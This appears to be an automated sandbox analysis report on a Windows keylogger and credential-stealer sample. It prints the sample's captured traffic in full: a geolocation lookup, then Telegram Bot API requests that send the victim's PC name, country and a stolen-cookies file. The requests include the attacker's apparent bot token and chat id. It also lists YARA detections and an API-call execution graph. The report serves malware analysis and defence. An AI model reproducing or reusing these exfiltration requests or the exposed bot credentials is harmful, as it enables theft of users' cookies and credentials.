                                                                                                                    2025-01-11 07:08:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.949821104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 07:08:41 UTC861INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:41 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894110
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy8a7JtDEXhyQ3XEtnzqtjqDQ7NzcX87e4k1Y4yNzQS0gNJk%2Fg%2BkEPxl9%2FFxk0l52L7bP7G9pyoamVsGBdx%2Bl1t1la%2FaFgE5%2BThGCepPZkkR1tK0z67DsosPuaO9UYY4D6DhgG7i"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 900313b4bd63729f-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1952&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=5bb59aab314f2cc0&ts=135&x=0"
                                                                                                                    2025-01-11 07:08:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.949824149.154.167.2204437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                    Host: api.telegram.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 07:08:42 UTC344INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:41 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 55
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 07:08:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.949874149.154.167.2204437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:49 UTC348OUTPOST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367a
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1277
                                                                                                                    2025-01-11 07:08:49 UTC1277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 39 64 39 64 66 65 33 36 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 30 34 36 37 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 31 2f 30 31 2f 32 30 32 35 20 2f 20
                                                                                                                    Data Ascii: --------------------------8dd329d9dfe367aContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:704672Date and Time: 11/01/2025 /
                                                                                                                    2025-01-11 07:08:49 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:49 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 56
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 07:08:49 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                    Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Target ID:0
                                                                                                                    Start time:02:08:28
                                                                                                                    Start date:11/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\x8M2g1Xxhz.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:2'841'088 bytes
                                                                                                                    MD5 hash:6776D32ED5B26C788E25C1632B555D47
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:6.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:50.9%
                                                                                                                      Signature Coverage:39.6%
                                                                                                                      Total number of Nodes:338
                                                                                                                      Total number of Limit Nodes:25
                                                                                                                      execution_graph 96276 8309ec0 96277 8309eed 96276->96277 96278 8309178 LdrInitializeThunk 96277->96278 96279 830bdd2 96277->96279 96281 830a1f9 96277->96281 96278->96281 96280 8309178 LdrInitializeThunk 96280->96281 96281->96279 96281->96280 95872 4660464 95873 4660425 Module32FirstW 95872->95873 95875 46604a3 95873->95875 96282 8e568d0 96283 8e568d4 CreateWindowExW 96282->96283 96285 8e569f4 96283->96285 96285->96285 95876 471e568 95877 471e574 95876->95877 95914 83027b2 95877->95914 95921 83027c0 95877->95921 95878 471e616 95928 830d339 95878->95928 95932 830d348 95878->95932 95879 471e624 95936 8517fcf 95879->95936 95943 8517fe0 95879->95943 95880 471e727 95950 8586068 95880->95950 95957 8586078 95880->95957 95881 471e838 95964 8586720 95881->95964 95971 85866f2 95881->95971 95882 471e83f 95978 85b21b0 95882->95978 95985 85b21c0 95882->95985 95883 471e949 95992 85b2688 95883->95992 95999 85b2678 95883->95999 95884 471e950 96006 85b86b8 95884->96006 96013 85b86a9 95884->96013 95885 471ea5a 96020 85b8940 95885->96020 96027 85b8930 95885->96027 95886 471ea61 96034 8570040 95886->96034 96041 8570006 95886->96041 95887 471eb6b 96048 8577d38 95887->96048 96055 8577d48 95887->96055 95888 471ec83 96062 857dd68 95888->96062 96069 857dd78 95888->96069 95889 471ed8d 95915 83027c0 95914->95915 95916 83028b1 95915->95916 96076 830977f 95915->96076 96082 8309168 95915->96082 96088 8309398 95915->96088 96094 8309178 95915->96094 95916->95878 95922 83027e2 95921->95922 95923 83028b1 95922->95923 95924 8309178 LdrInitializeThunk 95922->95924 95925 8309168 2 API calls 95922->95925 95926 8309398 2 API calls 95922->95926 95927 830977f 2 API calls 95922->95927 95923->95878 95924->95923 95925->95923 95926->95923 95927->95923 95929 830d342 95928->95929 95930 8309398 2 API calls 95929->95930 95931 830d437 95929->95931 95930->95931 95931->95879 95933 830d35c 95932->95933 95934 8309398 2 API calls 95933->95934 95935 830d437 95933->95935 95934->95935 95935->95879 95937 8517fd8 95936->95937 95938 8518117 95937->95938 95939 8309178 LdrInitializeThunk 95937->95939 95940 8309168 2 API calls 95937->95940 95941 8309398 2 API calls 95937->95941 95942 830977f 2 API calls 95937->95942 95938->95880 95939->95938 95940->95938 95941->95938 95942->95938 95944 8518002 95943->95944 95945 8518117 95944->95945 95946 8309178 LdrInitializeThunk 95944->95946 95947 8309168 2 API calls 95944->95947 95948 8309398 2 API calls 95944->95948 95949 830977f 2 API calls 95944->95949 95945->95880 95946->95945 95947->95945 95948->95945 95949->95945 95951 858609a 95950->95951 95952 85861b7 95951->95952 95953 8309178 LdrInitializeThunk 95951->95953 95954 8309168 2 API calls 95951->95954 95955 8309398 2 API calls 95951->95955 95956 830977f 2 API calls 95951->95956 95952->95881 95953->95952 95954->95952 95955->95952 95956->95952 95958 858609a 95957->95958 95959 85861b7 95958->95959 95960 8309178 LdrInitializeThunk 95958->95960 95961 8309168 2 API calls 95958->95961 95962 8309398 2 API calls 95958->95962 95963 830977f 2 API calls 95958->95963 95959->95881 95960->95959 95961->95959 95962->95959 95963->95959 95965 8586742 95964->95965 95966 8586818 95965->95966 95967 8309178 LdrInitializeThunk 95965->95967 95968 8309168 2 API calls 95965->95968 95969 8309398 2 API calls 95965->95969 95970 830977f 2 API calls 95965->95970 95966->95882 95967->95966 95968->95966 95969->95966 95970->95966 95972 8586742 95971->95972 95973 8586818 95972->95973 95974 8309178 LdrInitializeThunk 95972->95974 95975 8309168 2 API calls 95972->95975 95976 8309398 2 API calls 95972->95976 95977 830977f 2 API calls 95972->95977 95973->95882 95974->95973 95975->95973 95976->95973 95977->95973 95980 85b21b5 95978->95980 95979 85b22b8 95979->95883 95980->95979 95981 8309178 LdrInitializeThunk 95980->95981 95982 8309168 2 API calls 95980->95982 95983 8309398 2 API calls 95980->95983 95984 830977f 2 API calls 95980->95984 95981->95979 95982->95979 95983->95979 95984->95979 95991 85b21e2 95985->95991 95986 85b22b8 95986->95883 95987 8309178 LdrInitializeThunk 95987->95986 95988 8309168 2 API calls 95988->95986 95989 8309398 2 API calls 95989->95986 95990 830977f 2 API calls 95990->95986 95991->95986 95991->95987 95991->95988 95991->95989 95991->95990 95993 85b26a4 95992->95993 95994 85b2752 95993->95994 95995 8309178 LdrInitializeThunk 95993->95995 95996 8309168 2 API calls 95993->95996 95997 8309398 2 API calls 95993->95997 95998 830977f 2 API calls 95993->95998 95994->95884 95995->95994 95996->95994 95997->95994 95998->95994 96000 85b26a4 95999->96000 96001 85b2752 96000->96001 96002 8309178 LdrInitializeThunk 96000->96002 96003 8309168 2 API calls 96000->96003 96004 8309398 2 API calls 96000->96004 96005 830977f 2 API calls 96000->96005 96001->95884 96002->96001 96003->96001 96004->96001 96005->96001 96007 85b86d4 96006->96007 96008 85b8782 96007->96008 96009 8309178 LdrInitializeThunk 96007->96009 96010 8309168 2 API calls 96007->96010 96011 8309398 2 API calls 96007->96011 96012 830977f 2 API calls 96007->96012 96008->95885 96009->96008 96010->96008 96011->96008 96012->96008 96014 85b86b8 96013->96014 96015 85b8782 96014->96015 96016 8309178 LdrInitializeThunk 96014->96016 96017 8309168 2 API calls 96014->96017 96018 8309398 2 API calls 96014->96018 96019 830977f 2 API calls 96014->96019 96015->95885 96016->96015 96017->96015 96018->96015 96019->96015 96021 85b8962 96020->96021 96022 85b8a15 96021->96022 96023 8309178 LdrInitializeThunk 96021->96023 96024 8309168 2 API calls 96021->96024 96025 8309398 2 API calls 96021->96025 96026 830977f 2 API calls 96021->96026 96022->95886 96023->96022 96024->96022 96025->96022 96026->96022 96028 85b8962 96027->96028 96029 85b8a15 96028->96029 96030 8309178 LdrInitializeThunk 96028->96030 96031 8309168 2 API calls 96028->96031 96032 8309398 2 API calls 96028->96032 96033 830977f 2 API calls 96028->96033 96029->95886 96030->96029 96031->96029 96032->96029 96033->96029 96035 8570062 96034->96035 96036 8570115 96035->96036 96037 8309178 LdrInitializeThunk 96035->96037 96038 8309168 2 API calls 96035->96038 96039 8309398 2 API calls 96035->96039 96040 830977f 2 API calls 96035->96040 96036->95887 96037->96036 96038->96036 96039->96036 96040->96036 96042 8570016 96041->96042 96043 8570115 96042->96043 96044 8309178 LdrInitializeThunk 96042->96044 96045 8309168 2 API calls 96042->96045 96046 8309398 2 API calls 96042->96046 96047 830977f 2 API calls 96042->96047 96043->95887 96044->96043 96045->96043 96046->96043 96047->96043 96049 8577d48 96048->96049 96050 8577e12 96049->96050 96051 8309178 LdrInitializeThunk 96049->96051 96052 8309168 2 API calls 96049->96052 96053 8309398 2 API calls 96049->96053 96054 830977f 2 API calls 96049->96054 96050->95888 96051->96050 96052->96050 96053->96050 96054->96050 96056 8577d64 96055->96056 96057 8577e12 96056->96057 96058 8309178 LdrInitializeThunk 96056->96058 96059 8309168 2 API calls 96056->96059 96060 8309398 2 API calls 96056->96060 96061 830977f 2 API calls 96056->96061 96057->95888 96058->96057 96059->96057 96060->96057 96061->96057 96064 857dd78 96062->96064 96063 857de42 96063->95889 96064->96063 96065 8309178 LdrInitializeThunk 96064->96065 96066 8309168 2 API calls 96064->96066 96067 8309398 2 API calls 96064->96067 96068 830977f 2 API calls 96064->96068 96065->96063 96066->96063 96067->96063 96068->96063 96071 857dd94 96069->96071 96070 857de42 96070->95889 96071->96070 96072 8309178 LdrInitializeThunk 96071->96072 96073 8309168 2 API calls 96071->96073 96074 8309398 2 API calls 96071->96074 96075 830977f 2 API calls 96071->96075 96072->96070 96073->96070 96074->96070 96075->96070 96081 8309636 96076->96081 96077 8309777 LdrInitializeThunk 96079 83098d4 96077->96079 96079->95916 96080 8309178 LdrInitializeThunk 96080->96081 96081->96077 96081->96080 96087 8309178 96082->96087 96083 830918a 96083->95916 96084 8309777 LdrInitializeThunk 96084->96083 96086 8309178 LdrInitializeThunk 96086->96087 96087->96083 96087->96084 96087->96086 96092 83093c9 96088->96092 96089 830952c 96089->95916 96090 8309777 LdrInitializeThunk 96090->96089 96092->96089 96092->96090 96093 8309178 LdrInitializeThunk 96092->96093 96093->96092 96096 830917c 96094->96096 96095 830918a 96095->95916 96096->96095 96097 83098bc LdrInitializeThunk 96096->96097 96097->96095 96098 8e58ffc 96101 8e53ea4 96098->96101 96100 8e5900a 96102 8e53eaf 96101->96102 96103 8e590ba CallWindowProcW 96102->96103 96104 8e59069 96102->96104 96103->96104 96104->96100 96105 45fd044 96106 45fd05c 96105->96106 96107 45fd0b6 96106->96107 96112 8e56a79 96106->96112 96116 8e577d8 96106->96116 96120 8e56a88 96106->96120 96124 8e53d7c 96106->96124 96113 8e56a7c 96112->96113 96114 8e53d7c CallWindowProcW 96113->96114 96115 8e56acf 96114->96115 96115->96107 96117 8e577dc 96116->96117 96118 8e53ea4 CallWindowProcW 96117->96118 96119 8e57839 96117->96119 96118->96119 96121 8e56a8c 96120->96121 96122 8e53d7c CallWindowProcW 96121->96122 96123 8e56acf 96122->96123 96123->96107 96125 8e53d87 96124->96125 96126 8e53ea4 CallWindowProcW 96125->96126 96127 8e57839 96125->96127 96126->96127 96128 40cbdd 96129 40cbe9 __mtinitlocknum 96128->96129 96162 40d534 HeapCreate 96129->96162 96132 40cc46 96164 41087e RtlAllocateHeap __onexit_nolock __init_pointers __getptd ___wtomb_environ 96132->96164 96135 40cc4c 96136 40cc57 __RTC_Initialize 96135->96136 96204 40cbb4 RtlAllocateHeap __FF_MSGBANNER __mtinitlocknum __NMSG_WRITE 96135->96204 96165 411a15 RtlAllocateHeap __mtinitlocknum ___wtomb_environ 96136->96165 96139 40cc66 96140 40cc71 96139->96140 96205 40e79a RtlAllocateHeap __FF_MSGBANNER __onexit_nolock __NMSG_WRITE 96139->96205 96166 412892 RtlAllocateHeap _memcpy_s __mtinitlocknum 96140->96166 96143 40cc82 96167 4127d7 7 API calls 3 library calls 96143->96167 96145 40cc8c 96146 40cc97 96145->96146 96206 40e79a RtlAllocateHeap __FF_MSGBANNER __onexit_nolock __NMSG_WRITE 96145->96206 96168 41255f 7 API calls 6 library calls 96146->96168 96149 40cc9d 96150 40cca8 96149->96150 96207 40e79a RtlAllocateHeap __FF_MSGBANNER __onexit_nolock __NMSG_WRITE 96149->96207 96169 40e859 2 API calls 5 library calls 96150->96169 96153 40ccb0 96154 40ccbb 96153->96154 96208 40e79a RtlAllocateHeap __FF_MSGBANNER __onexit_nolock __NMSG_WRITE 96153->96208 96170 4019f0 OleInitialize 96154->96170 96158 40ccea 96210 40ea36 RtlAllocateHeap _doexit 96158->96210 96161 40ccef __mtinitlocknum 96163 40cc3a 96162->96163 96163->96132 96203 40cbb4 RtlAllocateHeap __FF_MSGBANNER __mtinitlocknum __NMSG_WRITE 96163->96203 96164->96135 96165->96139 96166->96143 96167->96145 96168->96149 96169->96153 96171 401ab9 96170->96171 96211 40b99e 96171->96211 96173 401abf 96174 401dc3 CloseHandle 96173->96174 96175 401c9c 96173->96175 96176 401dd0 96174->96176 96175->96158 96209 40ea0a RtlAllocateHeap _doexit 96175->96209 96220 40b84d 96176->96220 96178 401ebf 96224 40af66 96178->96224 96180 401ecb _memset 96181 401f5f 96180->96181 96249 401560 __VEC_memcpy ___sbh_free_block 96180->96249 96184 401f92 _memset 96181->96184 96250 401560 __VEC_memcpy ___sbh_free_block 96181->96250 96185 40b84d _malloc RtlAllocateHeap 96184->96185 96186 401fbb _memset 96185->96186 96187 4020aa LoadLibraryA 96186->96187 96188 40216c 96187->96188 96188->96175 96233 4018f0 96188->96233 96190 40243f 96190->96175 96251 40b6b5 RtlAllocateHeap __mtinitlocknum 96190->96251 96192 4021f1 96192->96190 96240 401870 96192->96240 96194 402269 VariantInit 96195 401870 3 API calls 96194->96195 96196 40228b VariantInit 96195->96196 96197 4022a7 _memcpy_s 96196->96197 96198 4023bc VariantClear VariantClear 96197->96198 96245 4019a0 96198->96245 96201 40242e 96202 4019a0 RtlAllocateHeap 96201->96202 96202->96190 96203->96132 96204->96136 96205->96140 96206->96146 96207->96150 96208->96154 96209->96158 96210->96161 96212 40b9aa __mtinitlocknum _strnlen 96211->96212 96213 40b9b8 96212->96213 96215 40b9ec 96212->96215 96252 40bfc1 RtlAllocateHeap __getptd 96213->96252 96253 40d6e0 RtlAllocateHeap __mtinitlocknum __amsg_exit 96215->96253 96217 40b9f3 96254 40b917 12 API calls 3 library calls 96217->96254 96219 40b9bd _getenv __mtinitlocknum _ferror 96219->96173 96222 40b85f __FF_MSGBANNER __mtinitlocknum _malloc __NMSG_WRITE 96220->96222 96223 40b8ec __mtinitlocknum _malloc 96220->96223 96221 40b8bc RtlAllocateHeap 96221->96222 96222->96221 96222->96223 96223->96178 96226 40af70 _malloc 96224->96226 96225 40b84d _malloc RtlAllocateHeap 96225->96226 96226->96225 96227 40af8a 96226->96227 96230 40af8c std::bad_alloc::bad_alloc 96226->96230 96227->96180 96228 40afb2 96256 40af49 RtlAllocateHeap std::exception::exception 96228->96256 96230->96228 96255 40d2bd __VEC_memcpy RtlAllocateHeap __cinit 96230->96255 96231 40afbc 96234 401903 96233->96234 96235 4018fc 96233->96235 96257 4017e0 __VEC_memcpy RtlAllocateHeap _calloc __mtinitlocknum __recalloc 96234->96257 96235->96192 96237 40191f 96239 401970 96237->96239 96258 4017e0 __VEC_memcpy RtlAllocateHeap _calloc __mtinitlocknum __recalloc 96237->96258 96239->96192 96241 40af66 2 API calls 96240->96241 96242 40187c 96241->96242 96243 401885 SysAllocString 96242->96243 96244 4018a4 96242->96244 96243->96244 96244->96194 96246 4019df VariantClear 96245->96246 96247 4019aa 96245->96247 96246->96201 96247->96246 96259 40aec0 RtlAllocateHeap __mtinitlocknum 96247->96259 96249->96180 96250->96184 96251->96175 96252->96219 96253->96217 96254->96219 96255->96228 96256->96231 96257->96237 96258->96239 96259->96246 96260 85fc740 96261 85fc744 GetCurrentProcess 96260->96261 96263 85fc7d8 GetCurrentThread 96261->96263 96264 85fc7d1 96261->96264 96265 85fc80e 96263->96265 96266 85fc815 GetCurrentProcess 96263->96266 96264->96263 